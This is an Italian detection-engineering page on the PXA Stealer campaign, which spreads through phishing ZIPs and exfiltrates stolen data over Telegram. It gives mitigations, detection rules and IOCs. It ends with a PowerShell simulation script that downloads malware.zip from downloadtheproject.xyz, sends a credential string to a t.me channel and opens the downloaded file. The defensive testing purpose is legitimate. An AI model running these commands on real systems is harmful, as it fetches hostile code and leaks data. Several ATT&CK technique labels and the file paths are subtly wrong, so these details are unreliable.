Dal Phishing all’Esfiltrazione: Un’Analisi Approfondita su PXA Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Il rapporto descrive un forte aumento dell’attività di PXA Stealer che prende di mira le organizzazioni finanziarie all’inizio del 2026. Gli attori delle minacce diffondono archivi ZIP dannosi tramite email di phishing e si affidano a una catena di infezione a più stadi che abusa di strumenti di sistema legittimi e un interprete Python rinominato. Una volta attivo, il malware ruba credenziali del browser, password salvate e dati dei portafogli di criptovaluta, quindi esfiltra le informazioni raccolte tramite Telegram. La campagna evidenzia come gli operatori abbiano adattato il loro modo di agire dopo interruzioni precedenti in altri ecosistemi di infostealer.
Indagine
I ricercatori di CyberProof hanno ricostruito l’intera catena di attacco, a partire da un’email di phishing che consegnava un archivio Pumaproject.zip dannoso e terminando con l’esfiltrazione basata su Telegram. La loro analisi ha identificato l’abuso di Certutil per la decodifica, una copia di WinRAR camuffata come picture.png per l’estrazione, una cartella Dots nascosta e un interprete Python svchost.exe rinominato usato per avviare uno script offuscato legato a un identificatore di bot. La persistenza è mantenuta tramite una voce nel registro di sistema.
Mitigazione
I difensori dovrebbero identificare allegati di archivi sospetti, monitorare l’esecuzione di script e LOLBins noti da percorsi inaspettati, e bloccare il traffico in uscita verso Telegram e TLD insoliti come .shop and .xyz. I team di sicurezza dovrebbero anche rinforzare i gateway di posta elettronica e applicare controlli rigorosi sull’esecuzione di file di Office e contenuti basati su script.
Risposta
Quando viene rilevato PXA Stealer, isolare il dispositivo compromesso, catturare prove volatili e cercare i file artefatti di riferimento e modifiche al registro. Rimuovere i file dannosi, terminare i processi interessati e ripristinare eventuali credenziali esposte. I team dovrebbero quindi eseguire un’indagine più ampia per cercare indicatori corrispondenti nell’ambiente e notificare le parti interessate.
Flusso di Attacco
Rilevazioni
Esecuzione di Processi di Sistema da Percorsi Atipici (via creazione_processo)
Visualizza
Comando e Controllo Sospetto tramite Richiesta DNS di Dominio di Primo Livello (TLD) Insolito (via dns)
Visualizza
Esecuzione Sospetta dal Profilo Utente Pubblico (via creazione_processo)
Visualizza
Estensione Insolita di Binario Eseguibile (via creazione_processo)
Visualizza
File Sospetti nel Profilo Utente Pubblico (via evento_file)
Visualizza
Utilizzo di Certutil per Codificazione Dati e Operazioni Cert (via cmdline)
Visualizza
IOC (HashMd5) per rilevare: Dal Phishing all’Esfiltrazione: Un Approfondimento su PXA Stealer Parte 2
Visualizza
IOC (DestinationIP) per rilevare: Dal Phishing all’Esfiltrazione: Un Approfondimento su PXA Stealer
Visualizza
IOC (HashMd5) per rilevare: Dal Phishing all’Esfiltrazione: Un Approfondimento su PXA Stealer Parte 1
Visualizza
IOC (SourceIP) per rilevare: Dal Phishing all’Esfiltrazione: Un Approfondimento su PXA Stealer
Visualizza
IOC (HashSha256) per rilevare: Dal Phishing all’Esfiltrazione: Un Approfondimento su PXA Stealer
Visualizza
Rilevamento Attività di Esecuzione PXA Stealer [Creazione Processo Windows]
Visualizza
Rileva Connessioni in Uscita di PXA Stealer [Connessione di Rete Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa dell’Attacco e Comandi:
L’attore della minaccia distribuisce il PXA Stealer su un host Windows compromesso. Dopo che l’utente esegue inconsapevolmente il binario dannoso iniziale (T1204.002), lo stealer esegue uno snippet di PowerShell che:-
Scarica uno ZIP dannoso dal dominio hard-coded
downloadtheproject.xyz(T1202 – esecuzione di comando indiretto). -
Esfiltra i dati raccolti inviando un messaggio a un canale Telegram via
t.me(T1559.002 – link di phishing). - Carica opzionalmente un componente COM dannoso per ottenere persistenza (T1127.002).
Sia le richieste HTTP GET in uscita sia il
DestinationDomainosservati dalla regola Sigma, causano un’allerta. -
Scarica uno ZIP dannoso dal dominio hard-coded
-
Script di Test di Regressione:
# Simulazione di PXA Stealer – attiva la regola di rilevamento $tmpZip = "$env:TEMPpayload.zip" $tmpMsg = "$env:TEMPsteal.txt" # 1. Scarica ZIP dannoso dal primo dominio dannoso Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing # 2. Simula esfiltrazione dei dati via link Telegram $payload = "User credentials: admin / Pass123!" Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing # 3. (Opzionale) Carica un oggetto COM fittizio per emulare T1127.002 try { $com = New-Object -ComObject "Shell.Application" $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null } catch { # Ignora errori – è solo per telemetria } -
Comandi di Pulizia:
# Rimuovi artefatti creati dalla simulazione Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue